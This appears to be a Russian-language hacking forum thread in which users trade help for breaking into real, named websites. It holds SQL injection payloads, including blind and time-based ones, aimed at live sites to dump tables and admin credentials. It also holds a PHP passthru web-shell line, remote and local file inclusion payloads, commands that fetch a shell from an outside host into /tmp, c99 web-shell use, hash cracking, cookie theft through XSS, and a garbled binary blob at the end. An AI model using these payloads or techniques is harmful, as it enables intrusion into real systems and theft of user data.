Ну, можно попробовать придумать сценарий успешного обхода такой проверки. У меня есть некоторые мысли, но чтоб на практике реализовать это, нужно чтоб совпало слишком много всего. Например, в MySQL 4.0.x можно использовать не-ascii-символы в качестве альтернативы пробельным символам в SQL-запросе. PHP же успешно пропустит некоторые такие символы через эту регулярку (не уверен, что всегда, но у меня получалось такое). Т.е. если SQL-инъекция, например, в параметре WHERE опреатора SELECT, и в этом запросе выбирается одна колонка, то запрос:
id=-1ђunionђselectђpasswordђfromђusers
скорее всего обойдет эту регулярку и успешно выполнится. Теоретически (я не пробовал)... (:
в том то и вся лажа(я забыл упомянуть) что в запрос идет $_POST['id'] в двойных кавычках, фактически мне достаточно и того что бы просто нарушить как то запрос,вызвать ошибку(есть другая скуля но для ее экплотации необходим префикс и в ней еррор не выводится вообше) а в этой скули в случаи неудачи выводится весь запрос с префиксом,а про то что \w может пропустить не совсем печатные символы которые некоторые версии мускуля могут воспринять как пробел( в зависимости от того как был собран PCRE) я в курсе, но двойную ковычку там ничего не заменит, в попытках вызвать Illegal mix of collations я уже испробывал все возможные кодировки, вот запрос которые идет в базу:

SELECT content_name FROM $base.".$prefix_."content_item WHERE $base.".$prefix_."content_item.content_name = \"" . $_POST['id'] . "\" LIMIT 1";

content_name:
varchar(100) ,utf8_unicode_ci, по умолчанию null

При запросе www.host.ru/new/?' вылазит ошибка
insert into statistic(resource,charset,user_agent,remote_addr, method,URI,DC) values (' - equipment','windows-1251','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)','IP','GET','/new/?'',NOW())<br>: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/new/?'',NOW())' at line 1
В дальнейшем на
+order+by+10000--
+order+by+10000/*
'+order+by+10000--
?-1+order+by+10000--
просто выводит страницу...+ на /**/ заменял....как обойти такую фильтрацию, или может нужно по другому запрос сделать?
ПС. Все хедеры отправляю HttpREQ, т. к. браузер даже на /new/?' не реагирует.

Ты на запрос посмотри - там тока блаинд.

Я понимаю что блинд. но запросы то +order+by+1000000-- и +order+by+1-- должны возвращать разные результаты...или нужно использовать подзапросы?

для начало почитай здесь - http://www.phpclub.ru/mysql/doc/insert.html

потом неспеша сюда переходи- http://forum.antichat.ru/thread119047.html
вопросы должны отпасть.

Помогите разобратся вот с этим.
http://forum.antichat.ru/threadnav49775-2-10.html

как понять эту строчьку ?
User-Agent: <?php passthru($_GET['cmd']) ?>
C помощью чего её передать?
Ясно что post запросом но при помощи чего ??

Этой коммандой ты можешь исполнять системные комманды, используя параметр $_GET['cmd'], т.е. http://site.com/script.php?cmd=help. Передать с помощью программы, отсылающей сокеты, н.п. InetCrack.

При входе в панэль администратирования задаю зачение:
login:'
Pass:'

в ответ:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1


' or 1=1/*

возврощает ответ:

Неверный пароль!

В принципе подобра что есть 4 колонки но скуля блайнд.
Что можно придумать с авторизацией?

PS :jokester c заливкой через ../../proc/self/fd/2%00 почемуто не канает(.

пытаюсь заюзать багу в wordpress 2.3.1
http://site.com/bloggi/?feed=rss2&p=11/**/union/**/select/**/1,2/**/+--+
в ответ ошибка

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10' at line 1]
SELECT wp_comments.* FROM wp_comments WHERE comment_post_ID = AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10

че делать?

смотри на запрос:
SELECT wp_comments.* FROM wp_comments WHERE comment_post_ID = AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10

из него же видно что comment_post_ID = идет сравнения но ничего не вставляеться в запрос т.к. твой данные не прошли фильтр.

Подскажите есть ли уязвимость в этом скрипте подгрузки?
Если да, то как можно использовать для PHP-inj

if (!IsSet($t)&!IsSet($f))
{
$f="main";
$filename=$f . ".php";
}
else
{
if (IsSet($t)&!IsSet($f))
{
$filename=$t . "/index.php";
}
if (IsSet($t)&IsSet($f))
{
$filename= $t . "/" . $f . ".php";
}
if (!IsSet($t)&IsSet($f))
{
$filename=$f . ".php";
}
}


if (file_exists("$filename"))
{ include("$filename"); }
else
{ echo " <div class=\"alert\"> Ошибка 404, Страница не найдена. </div>"; }

Есть phpmyadmin и юзер с полными правами. Пытаюсь залить шелл в разные директории пишет:"Can't create a file...", но успешно создает при попытке залить в /tmp/. Что можно сделать в этой ситуации?

2 Shaitan-Devil:

искать директорию на запись, например сканером сайта на папки

2 Byrger
[RFI]
заливаешь на фтп шел с именем index.php
?t=ftp://login: password@site.com
или шелл с любым именем, но без расширения
?f=ftp://login: password@site.com/shell

[LFI]
?t=../../../../../../../../etc/passwd%00
?f=../../../../../../../../etc/passwd%00

2 Shaitan-Devil
можешь посмотреть сайты по реверс айпи на присутствие локального инклуда, и потом инклуднуть записанный в /tmp шелл

2 Byrger

если в $t диру а в $f имя файла то можно будет проинклюдить существующий файл.

2 Byrger
[RFI]
заливаешь на фтп шел с именем index.php

или шелл с любым именем, но без расширения


[LFI]



2 Shaitan-Devil
можешь посмотреть сайты по реверс айпи на присутствие локального инклуда, и потом инклуднуть записанный в /tmp шелл

Ошибку 404 типо выводит. Проверка существования файла срабатывает.
Оба способа пробовал

[0]:webmaster:њyЯu›И§
[1]:administrator:џЊ6г–А¶Ґ2И
[2]:morogoy:¶pР
[3]:dorogoynn:Эxi›лPcх
[4]:anna:NЂ—оB7е
[5]:dorogoy:Уќ=цКі¶э ѓ
вывожу из 5й ветки базы он мне вот такое дело выдает в чем беда? как исправить?

вывожу из 5й ветки базы он мне вот такое дело выдает в чем беда? как исправить?

попробуй
AES_DECRYPT(AES_ENCRYPT(
хотя, судя по всему ты юзал СИПТ, и там по умолчанию крипт.

еще варианты:
cast(Version()+as+binary)
CONVERT(Version(),binary)
convert(version()+using+latin1)
convert(version()+using+binary)

да я и unhex(hex())
не помогает а юзал я да сипт
я уж и руками пробовал

$n@ke
перепробовал все ничего не помогло все так же осталось

еще у кого нито варианты будут?

еще у кого нито варианты будут?
Будут

Это скорее всего AES_ENCRYPT НО что-бы расшифровать нужен ключ.

Тоесь пароли попросту зашифрованы


как исправить?
Узнать ключ и расшифровать. А лучше алгоритм, тк. может быть и самопис, визуально не поймёшь

jokester
и как вообще этот ключ может выглядеть?
допустим я узнал ключ как это расшифровывать?!

http://www.mysql.ru/docs/man/Miscellaneous_functions.html
AES_ENCRYPT
AES_DECRYPT

Посмотри, думаю всё станет понятно

Помогите...
http://www.aftech.ru/about/news/?nid=999999+UNION+SELECT+1,222,3,4,5,6,7,8,9--

Unknown column 'news_datetime' in 'order clause'
Как это обойти?

http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+fro m+information_schema.tables+limit+17,1),1,1))%3E1--

http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+UNION+SELECT+0,1,2,column_na me,4,5,6,TABLE_NAME,8+FRO M+INFORMATION_SCHEMA.COLUMNS+LIMIT+145,3500+--+
рубает column_name а также schema_name что можно придумать?

Все выводится

http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,c olumn_name,9+from+information_schema.columns--+

http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,t able_schema,9+from+information_schema.columns--+

password -> 0x70617373776F7264

http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,t able_name,9+from+information_schema.columns+where+ column_name=0x70617373776F7264--+

phpads_users
site
Users

Пиплы,вопрос! Залил c99 на удалённый сервак.Захожу в Sec - показывается только функция /etc/passwd.Пытаюсь аплоаднуть другой шелл в другую директорию,доступную на запись - фигли.Меня кидает обратно на диру,куда я залил шелл(/download).Чем вызвана эта болезнь ? Также интересует причина возникновения *чёрных пятен*,а точнее,огромного тёмного экрана вместо исходного кода рнр скрипта.Проблема возникает при попытке просмотреть исходный код.Права для гостей(в том числе,и для меня,хоть я и отношусь к группе www на сервере),есть ТОЛЬКО права на чтение,но я ведь и не собираюсь запускать скрипт,а лишь только глянуть его исходник.У кого какие мысли ?

Во избежание лишних вопросов:

Apache: 1.3.27
PHP: 4.2.3
SAFE-MODE: OFF
Open-basedir: no value

))) а uname -a и id??

Работают )

Что самое интересное,так это то,что права,выставленные на фаил,не влияют))).Фаил тупо не грузится и всё тут - чёрный экран.(проверял на фаилах с правами 777)

ну дык как загрузил шелл - так и грузани его с тем именем и в ту папку, в которую ты хотел бы. Или не шелл, а что ты там хотел. Чо тут думать.

Плюс попробуй загрузить что угодно (не обязательно шелл) в папку /tmp ,как через choose, так и так вот:

1. lynx -source "http://site/shell.txt" > /tmp/shell.php
2. links -source "http://site/shell.txt" > /tmp/shell.php
3. wget -o /tmp/shell.php http://site/shell.txt
4. GET http://site/shell.txt > /tmp/shell.php
5. fetch -o shell.php http://site/shell.txt
6. curl --output shell.php http://site/shell.txt

а потом:

cp /tmp/shell.php /абсолютный_путь/папка/новое_название_шелла

ЗЫЖ Или сразу "cp":)

Есть 2 вопроса:

1) Про внедрение в иньекцию UPDATE.

Пробовал на различных серваках так:

news.php?id=3+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8 ,9;+UPDATE+имя_табл+SET+колонка1=0x. ..+WHERE+колонка2=0x.../*

Если вывод ошибок не отключен, то пишет что ошибка в синтаксесе.

news.php?id=3;+UPDATE+имя_табл+SET+коло нка1=0x...+WHERE+колонка2=0x.../*

Тоже не срабатывает

news.php?id=3;/*

И даже такие запросы почему то не проходят.

Поясните пожалуйста. Я понимаю если бы писало нет привелегий. У кго ибудь получалось значения в таблицах менять? Буду очень рад примеру


2) Вопрос. Получил пароль админа

В таблице с юзерами есть поле salt но оно у всех пустое. Походу подсаливание не задействовано.

admin:a1wGqpFwp6D8M

Как то зашифрован.

Зарегал своего юзера


b95tOay72AuUU - в таком он виде лежит в таблице
MdD2hK - сам пароль


Как расшифровать????

2 farpost
php не поддерживает выполнения запросов к БД, разделенных символом ;

И как токда проупдэйтить запись?

2 farpost
php не поддерживает выполнения запросов к БД, разделенных символом ;
А я всегда думал что это mysql не поддерживает разделение запросов ; ;)

И как токда проупдэйтить запись?
никак! Если изначально скуль не в update запросе... ;)

Вопрос по XSS, а точнее защите от нее.
Есть в JS стандартные функции фильтрации входных данных ?
Нашол только функции для пхп, а нужно для JS, хотяб самые бональные

Пасип те,Паш))lynx работает,ща остальное всё проверю)))

2 farpost
php не поддерживает выполнения запросов к БД, разделенных символом ;

Ты уверен,что это во всех базах данных ?Почему в статьях тогда пишут,что можно ?

ну дык как загрузил шелл - так и грузани его с тем именем и в ту папку, в которую ты хотел бы. Или не шелл, а что ты там хотел. Чо тут думать.

Ты не понял.Шелл я загрузил и всё нормально,но как только я хочу просматривать исходники скриптов,бегая по каталогам,то появляется какой-то ГРЁБАНЫЙ ЧЁРНЫЙ ЭКРАН.В этом вся проблема,понимаешь?Каждый раз их инклудить у меня челюсть отвалится.Можно и скрипт написать,который парсит все скрипты,но это будет,имхо,неблагоразумно и палевно...

Ты не понял.Шелл я загрузил и всё нормально,но как только я хочу просматривать исходники скриптов,бегая по каталогам,то появляется какой-то ГРЁБАНЫЙ ЧЁРНЫЙ ЭКРАН.В этом вся проблема,понимаешь?Каждый раз их инклудить у меня челюсть отвалится.Можно и скрипт написать,который парсит все скрипты,но это будет,имхо,неблагоразумно и палевно...

Какой шелл юзаешь?
Покажи скриншот этого "черного экрана" ))

Подскажите можно с этгоко кода провести скуль через юзерагент, и если да то можете сказать точный запрос чтобы просмотреть записи с этойже таблицы.
Вот код:
$update = mysql_query("UPDATE 'chat_users' SET 'time' = '".$online."', 'place' = 0, 'ip' = '".getenv('REMOTE_ADDR')."', 'ua' = '".htmlspecialchars(getenv('HTTP_USER_AGENT'))."' WHERE 'id' = '".$id."';");

Скрипт удаляет все что между ковычками(< >) и сами ковычки, возможно ли обойти такую фильтрацию?

2 Велемир:

значит либо шелл левый, либо прав не хватает - вывод - либо менять шелл, либо рутать

Какой шелл юзаешь?
Покажи скриншот этого "черного экрана" ))

Господи,ты черных экранов не видел? с99madshell юзаю.

2 Велемир:

значит либо шелл левый, либо прав не хватает - вывод - либо менять шелл, либо рутать

На что не хватает прав ? На файле права были -rwxrwxrwx,т.е. полные,а у Apache вообще права nobody(в httpd.conf User nobody Group nobody);Группа: www.Наверное,проблемы с шеллом или ещё какие заморочки. Проблема в том,что я не могу юзать рнр или запускать скрипты всвязи с черным экраном этим...попробую р57 или NFS.

На что не хватает прав ?


да на что угодно, сверху, если c99, есть такая строчечка:

uid=67000(лала) gid=4000(лала) groups=4000(лала)

и напротив каждого файлика есть:

Owner/Group

так что достаточно просто посмотреть:)

На что не хватает прав ?


да на что угодно, сверху, если c99, есть такая строчечка:

uid=67000(лала) gid=4000(лала) groups=4000(лала)

и напротив каждого файлика есть:

Owner/Group

так что достаточно просто посмотреть:)

... Я реально не догоняю.Права на чтения у любого почти файла r есть...В общем,проблема оказалась действительно в с99.Искренне благодарен всем за помощь.Сэйф мода там нет,так что на воадельца/группу глубоко *****.Файлы,которые я не могу запустить,с99 пишет красным сразу,а эти норм.Права соответствующие,так что не вижу проблемы.Ты был прав,так что не стоило и сомневаться.Ща буду изучать phpinfo()...

А как скачать содержимое базы, зная её имя (скуля уже есть, кол-во вычислил, просто смотреть в браузере неудобно)

http://forum.antichat.ru/showpost.php?p=1297245&postcount=7363
Ап пост...
И ещё как от этого защититься если есть уязвимость.

Уважаемые Знатоки MSSQL обьясните неумному
как вообще с ней работать?
как версию вывести итд
+5 за грамотный ответ :) если он вам нужен конечно и большая благодарность
http://www.natecla.org.uk/news_details.asp?NewsID=-1+select+1+from+users

Вообшем не кто не подскажет какойнибудь брутер скл таблиц что бы хранил куки ? ))

Как установить соединение с веб шелла на определённый порт ? Сервис неизвестен.

функция bind в шелле.

Он не может даже скачать бинд скрипт на перле.Где его можно надыбать ?

Велемир, хватит использовать с99 везде и всюду. Есть и другие шеллы.

или погугли bind.pl

кто нибудь дайте линк на словари таблиц на Mysql. Раньше юзал но шас хз не помню

здесь есть:

тут (http://pashkela.narod.ru/progi/sipt4.rar)

Посоветуйте какую-нить прогу для Blind sql inj.... Архив Grey'a выдает CRC Еррор :(

Неужели в гугле не найти?
Тот же sipt4..

Посоветуйте какую-нить прогу для Blind sql inj.... Архив Grey'a выдает CRC Еррор :(
Скрипт от Грея
залил
_http://www.sendspace.com/file/6e3r62
а вообще..ещё посоветую bsqlbf (http://code.google.com/p/bsqlbf-v2/)

здесь есть:

тут (http://pashkela.narod.ru/progi/sipt4.rar)
спс у меня sipt4 есть, но как раз для него ещу дополнително

Велемир, хватит использовать с99 везде и всюду. Есть и другие шеллы.

или погугли bind.pl

Меня он вполне устраивает.

или погугли bind.pl



ага,повторил,что такое BIND сервер и даже вспомнил команду bind в никсах )

Неужели в гугле не найти?
Тот же sipt4..
Нету в сипте 4 посимвольного брута....


Еще вопрос по blind...
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+fro m+information_schema.tables+limit+1,1),1,1))>=1--

http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+fro m+information_schema.tables+limit+1,1),1,1))>=200--

Видно что вывод разный, написал кое-как кривой скрипт, сдампил таблицы...

терь вопрос почему
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FR OM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x2 76E65777327),1,1))>=1--
и

http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FR OM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x2 76E65777327),1,1))>=200--

Возвращают одинаковые результаты...
таблица 0x276E65777327=news точно есть, т к
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+*+FROM+news),1 ,1))>=1--

2DeepXhadow как нет посимвольного брута в сипт4?
select+table_name+from+information_schema.tables+l imit+{N16-300},1

DeepXhadow http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FR OM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6 E657773+limit+1,1),1,1))>=1--
1) При выводе колонок тоже нужен limit;
2) Хексить нужно значение без кавычек, т.е. news=0x6e657773, а не 0x276E65777327.

Есть инъекция, число колонок то я нашел, но дальше при выполнения запроса
http://www.clavesin.ru/addcard?dataID=-1227+union+select+1,2,3
происходит редирект. Что с этим можно сделать, кроме как посимвольно брутить?

nemaniak а ты попробуй какимнить http дебагером! типа Accessdiver

я глянул полей с выводом нема ((

а после редиректа нет полей с выводом? часто бывает что они присутствуют. Ежели нету, но хочется норм.скули - поищи ее в другом месте.

http://www.clavesin.ru/articles/index_tplid4_recid3'.html

without redirect

http://www.clavesin.ru/articles/index_tplid4_recid3+or+1=1.html
выдает ошибку, подскажите плиз почему? И как эту инъекцию раскрутить бы?

http://www.clavesin.ru/articles/index_tplid4_recid3+or+1=1.html
выдает ошибку, подскажите плиз почему? И как эту инъекцию раскрутить бы?
Там для выполнения запроса, должна присутствовать одинарная ковычка в запросе, а она "фильтруется"
http://www.clavesin.ru/articles/index_tplid4_recid3/*'*/.html

http://www.thechimneypot.com/newsletter.php?id=11+order+by+5--
http://www.thechimneypot.com/newsletter.php?id=-1+union+select+1,2,3,4,5

Union'ом подобрал до 50 - без результатов.

http://www.thechimneypot.com/newsletter.php?id=11+and+1=if(ascii(substring((sel ect+table_name+from+information_schema.columns+whe re+column_name+like+0x257061737325+limit+0,1),1,1) )>1,1,2)--+

Либо рядом

http://www.thechimneypot.com/gallery.php?category_id=17&hall_of_fame=&project_id=-336+union+select+1,2,3,4,table_name,6+from+informa tion_schema.columns+where+column_name+like+0x25706 1737325--+

Есть сайт site.ru на этом сайте есть XSS-уязвимость. Есть субдомен - forum.site.ru, с него необходимо стырить куки. Можно?

Походу,тут решает переменная path в session_id,если не ошибаюсь() ).Если path=/,то куки доступны всему домену)

2mailbrush
Возможность есть только если в куках прописано чтото типа domain:.site.ru
А так никак, так как поддомен это уже совершенно ДРУГОЙ сайт и куки там устанавливаются ДРУГИЕ

Да, я это знаю, насчет поддоменов, просто встречались такие XSS-ки, которые работали на субдоменах.
Возможность есть только если в куках прописано чтото типа domain:.site.ru
Вот, именно это я и хотел узнать. Такого нету... Теперь смысл понятен.

а чем это может меня порадовать и какие выводы можно из этого сделать?
http://www.sela-shop.ru/clothes.aspx?cat=93&scat=14'

думаю только раскрытие путей
Source File: c:\Inetpub\wwwroot\sela-shop.ru\App_Code\PublicItems.cs Line: 1565

Есть где нибудь (поиск не помог) программка или скрипт для выдирания данных через blind иньекцию. Не слишком замороченная, просто что бы делила АСКИ диапазон пополам, потом ещё раз пополам итд... вобщем чтобы минимизировала число запросов?

2farpost, вот держи:
https://forum.antichat.ru/showpost.php?p=894169&postcount=5

order by помог подобрать кол-во столбцов)
выяснил что сервак реагирует нехорошо на слово select. показывает 500 error)
пробовал и SeLeCt и sel/**/ect не помогает(
с подзапросами тоже обламывается)
какие есть варианты?)

Зравсвуйте вот нашел сайтец http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&online_only=1&search=1&age_start=1'&age_end=1&country=1 помогите пожалуйста пытаюсь подобрать кол-во полей ни как ни могу перечитал все статьи по sql инъекциям.

какие есть варианты?)
1 попробовать POST
2 дать линк

2^YaHoo^
http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&online_only=1&search=1&age_start=1)))+order+by+1000+--+&age_end=1&country=1
дальше сам)

HI! что можно с этим сделать http://bf2.провайдер.ru/info/index.php?IP=1'&sort=points&port=29900&liteTag=something&mode=qr3&sort=points

HI! что можно с этим сделать http://bf2.провайдер.ru/info/index.php?IP=1'&sort=points&port=29900&liteTag=something&mode=qr3&sort=points
Даже не знаю что посоветовать.

Попробуй так
http://bf2.провайдер.ru/тут/типо/линк/бажный_скрипт.php?IP=1+тут+вста вить+супер+пупер+ха керский+скуль+запрос+отсеч� �_комментарием_оставшуюс я_часть&sort=points&port=29900&liteTag=something&mode=qr3&sort=points

Должен вывести аккаунт

Если не выйдет , пиши, будем пробовать "Удалённо_инклудовать_файл" (с)

Прикольно обязательно попробую :-)

Всем привет, у меня такой вопрос, можно ли как нибудь попасть в админ панель.
Как я вижу, что авторизация проходит так: в БД ищется юзер с соответсвующем поролем из БД.
А дальше я понять не чего не могу :)




$login = $_GET['login'];
$pass = $_GET['p'];

$result = mysql_query("SELECT `pass` FROM `superadmin` WHERE `login`='$login';");
$row=mysql_fetch_row($result);
if(!empty($row))
{
$truepass = $row[0];
if ($truepass == $pass || $truepass == md5($pass))

{
// вход осуществлен
else
{
//неверный пароль
break;
}

else
{
//неверный пароль
}

помогите пожалуйсто разобраться

Уязвимый скрипт у тебя... SQL-инъекция там..

mailbrush,можеш носом меня тыкнуть, где там уязвимость и как ей воспользоватся?

2 SeNaP
уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк

2 SeNaP

Там то, что вернет запрос (пароль) должно соответствовать тому, что в переменной p

При волшебных_кавычках = офф

login.php?login=-1'+union+select+123--+&p=123

Вроде так, если я не накосячил

Понял одно, что один уязвимый параметр это login
:confused:

А чего те не понятно....
Товарищь Iceangel_ тебе же написал....

Iceangel_
уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк

Можете хотябы пример написать как крутить.... пожалуйсто

SeNaP, откуда этот код ? Ты конкретный сайт хекаешь ? Кинь ссылку сюда либо мну в пм либо попробуй сам то что я написал

.php?login=-1'+union+select+123--+&p=123

Ты должен попасть в админку (но только если magic_quotes_gpc=off)

плизз дайте кто ссылку на сервис для перевода в чар и sql hash (типа 0x3a).

все спомнил))) если надо то вот x3k.ru

плизз дайте кто ссылку на сервис для перевода в чар и sql hash (типа 0x3a).
вот хороший сервис....
http://noxak.ru/tools/

все же советую сделать как ElteRUS, более рационально, чтобы попасть именно в админку, но если ты захочешь юзать скуль для других целей, вот тебе пример запроса
?login=999'+or+if(ascii(substring ((select+concat_ws(0x3a,login,pass)+from+superadmi n+limit+0,1),1,1))>1,BENCHMARK(1000000,md5(current_date)),2)--+
в случае истинности условия, ответ от сервера будет приходить с запозданием

все же советую сделать как ElteRUS, более рационально, чтобы попасть именно в админку, но если ты захочешь юзать скуль для других целей, вот тебе пример запроса

в случае истинности условия, ответ от сервера будет приходить с запозданием

Чёт не какой ошибки, сервер работает без опоздания :(

Значит мэджики включены.

Кто знает,от какого двига табла KBArticle

http://www.infoboard.com.ua/?url=advertisement&action=find&find_done=1&ad=4&rubr[18]=18'

собственно здесь не пойму как и че, кто подскажет? :)

У меня скорее просьба чем вопрос. Почитал много статей по XSS, скорее даже все. Напишите пожалуйста сюда или в личку страницу любую в инете с рабочей хсс и укажите поле, хочу попробовать найти т.к. не совсем верно понимаю систему поиска (в частности как страница реагирует на вводимые '';!--"<XSS>=&{()} например) и вообще в каком месте она должна реагировать

Напишите пожалуйста сюда или в личку страницу любую в инете с рабочей хсс
Посмотри в этой теме
--->
Активные XSS (http://forum.antichat.ru/thread35802.html)
<---
Тут достаточно много активных XSS выложено...

Здравствуйте, можете пожалуйсто сказать, каким образом сливаются скрипты с сайтов?

Здравствуйте, можете пожалуйсто сказать, каким образом сливаются скрипты с сайтов?
Через шелл, а шелл сначала надо залить

http://old.guoedu.ru/priemnaja/?doc='
кто поможет? :)

http://old.guoedu.ru/avg_conf/?doc=111+order+by+8/* 8 полей, но тут тяжелый случай -2йной запрос...

http://old.guoedu.ru/forum/?doc=115&act=forum&id=-2++union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9--&topic=6

суть вопроса.
запрос: select ... from ... where ... order by act_(вот после этого я могу подставить что нить в запрос)
в ответе можно веть по сортировке узнать как выполнился запрос но в том то и дело что таблица пустая из которой все это выводится.
union тоже не прокатит после order
версия mysql 4.x
какие есть соображения?

Вот такие:

select ... from ... where ... order by (select+if(substring(version(),1,1)=4,1,(select 1 union select id)))

Пост
http://forum.antichat.ru/showpost.php?p=507099&postcount=10

Ну и вообще весь материал почитай

2jokester ожидал))
вот только проблема что там префикс подставляется
запрос: select ... from ... where ... order by act_(вот после этого я могу подставить что нить в запрос)
т.е. в order никак не залезть. вот и проблема.

смысл понятен из того поста.
вот и в этой ситуации что можно добавить в запрос чтобы выполнить эти функции уже после ...order by act_id

2jokester ожидал))
вот только проблема что там префикс подставляется

т.е. в order никак не залезть. вот и проблема.

Узнай имя колонки (подбери (насколько я понял, в твоём случае правильный линк (без инъекции) будет содержать имя столбца)), а дальше как в статье (п 3.4):

https://forum.antichat.ru/showpost.php?p=407227&postcount=3

2Grey случай у меня запущенный...
таблица пустая. непонять какая сортировка будет(
и select .. from .. where .. order by act_id (вот после этого можно что нить вставлять)

немного прояснилось но не до конца)
можно использовать несколько столбцов после order by(.. order by id,login, ..)

теперь такая конструкция:
select .. from .. where .. order by act_id,(select+if(2=1,1,(select 1 union select act_id)))

второе выражение тоже должен проверять но не появляется ошибки(
хотя: select .. from .. where .. order by act_id,1000 вызывает ошибку ERROR:Could not query database Unknown column '1000' in 'order clause'
сидел думал...)
такая конструкция -
order by act_id,(select+if(2=1,1,1000)) начнет сортироватся и по 1000 столбцу и должна вылететь ошибка но ее нет(
в чем проблема?

j0ker13

Насколько я понимаю, если в параметр ORDER BY мы помещаем выражение, то нужно чтоб оно возвращало именно имя колонки, по которой должна происходить сортировка, а не ее номер.

order by act_id,if(substring(version(),1,1)=4,1,(select+col umn_name+from+information_schema.columns))

more than 1 row

Это пример, я понимаю что у тебя 4 ветка, но сути это не меняет и должно работать, надеюсь принцип понятен

order by act_id,if(substring(version(),1,1)=4,1,(select+col umn_name+from+information_schema.columns))

more than 1 row

Это пример, я понимаю что у тебя 4 ветка, но сути это не меняет и должно работать, надеюсь принцип понятен

Тогда лучше получать море ван роу, руками, как писал др. Зиро: (select 1 union select 2), а не выводом из таблицы.

Ну это без разницы конечно. Я просто на локалке как тестил, так и скопировал. Поэтому и написал, что пример. Главное что-бы принцип был понят :)

Люди,большая проблема.Залил с99 шелл(не придираться,убью наф).И вот,выдало:

‹д=щsЪHЦ?OЄт?ј!•Њ=Дa;±10л;юЖЧ� �dІЩT*%¤TЦ`Ж›яэ{Ї[taЩЮљZ(ЫЁХпиwч!ьтE{дz·=bІЪmМ“ aдyv•}чµq§r`™3Ѕjojі (вЄSсШќW#А]PFІг2Ї3СLХљёХFs«QЙАt&›C_Ж±1ік»гiћОєо?йъ?'“‰$›SЧ x’г·kвы¦чщмЁытEпобштўWЅ9эчQ ¶mo.П.Ї[
+опќџћ}nБ�9ЄlК»?ц/?#°«8–®чe§:ђVU,Эrv»NЇЭШmw$гАў� �:ЅгFЪp¤гЏ—СgCНлЎКОm.)П‘•ЫЊ� �Іг$АPР8§-ш3”CпP"Ґ3'”д§ЈУ“Ѕ�–cИъn\јЌ:Йwпач� �лЛЏ‡?ьЅъ~уэf$фЙHуXљИчТH„Sez� �ЂCпи_ЅкбСБех^пфт‚АM†X[ѕykZ3.ќiж‹ёСd¬КTкаFЦ�л&А7Q‰єFP’{«™х{Ыr5OіМ–Ьw-Э'ЕL4Хµљхє}· }ЛAђVУѕ
©РЧС®° 6d0Уџ·
|ЂVGЊ¬СVЕw\„QЩ@цu4—±жj}MЧјik¤© *3wчAW?ъ‰9 -»Ќ‡ЌН->†E^A0Њ бР|ПіLтсЭe†ўЮM°|ГXР=rйdзy{ВL6� �ЯВћЈ‘NyWы‹qO!QЋ„XHДє‡бЮЫІ Єjж°ЄіЃЧjрЃ„M%‡ЯэЎ™¶пЭ/Џ1ЉO1’<ц…чЏщkЃнћ<І yY6ЇЮсЧоємщщ( 9?=—йLyF‰Z6™/<AmаИ{F‚6Ьџп]џњ^T{—W-аv4м_цz—зAЫЩйЕQхC[хЧ?ъєҐЬ~ч-ЏЭ/с4ЗГЃе;sЮВ±vЗФИЭK@aµ·CпИ›ђ3 vБђќЎfV=Лћoи[h}F ¶bmВя`#ЦДЅ6©%
A¬ыпч›ыu4eKќѕхФ·ЮозщЏrLўоР{>`4PHB'P© еэxщBrЅ©О
3Хс»ШВQND87[e›rf,Йt‰Ё\$?д8Т“пуxPnb*§їuBЃP” m’јyзЭ,–њЛg¤ј ЎхТС#[%™/ў№МШ• юҐrБ¤\(µg‡б…ЕJћPЮ+зЭўЂ3Е3hщ"Сµњ$џ>°6ЗЌoy&RdnUАg кЁKEpc+ЫеН=s}®\p/VЛЇD ?Y_?hO<.™(ћѕъ+7щ[Pњb^KO?
(–KGР\з,’СJзи"±Їdњ)]DжЉІЛyЪ,gЉ¤У/‘>’[>ГЊд±"v./Џж .Ы”.µry)_Юљ¶_Ш_БHУW>і,eUoIЉ}…‹іщ?%Г@ЎІшб)ю©iщн–м ІЊ-cлйqюdжЪвЋшx5ИњpЉ.�<Нџ¬?»’Щ<’k‡ќ‚=thЧh‹ЅыЖм»ц.нД·kЮ?~9Бv� �ЪmЫб:QA±vo¬Ѓ7‘Цp{¶¬ЊX)5Ґ X;`¦wyі.A[†‘ГќКoІвuм‘™«ћм ™Ч©|ллІyЛсµэоХ‡«Ъ–ФђЮµk>±‡?2яc-Ѓ‘©л1NqАЛ™fъwћKощT%З‡¦фNjlW лНmЧ“ыхwu© Їps~=џБяЙ&46 Qo57[х8їщљuьp·эоЫ»НVъЭCН•ы:Saа› ќ†r©K
h81 ЖМоЕеЕСLфI#щДЂЉаN«|ј>KБtyW!v№fC …аАP·ъІо¶?d
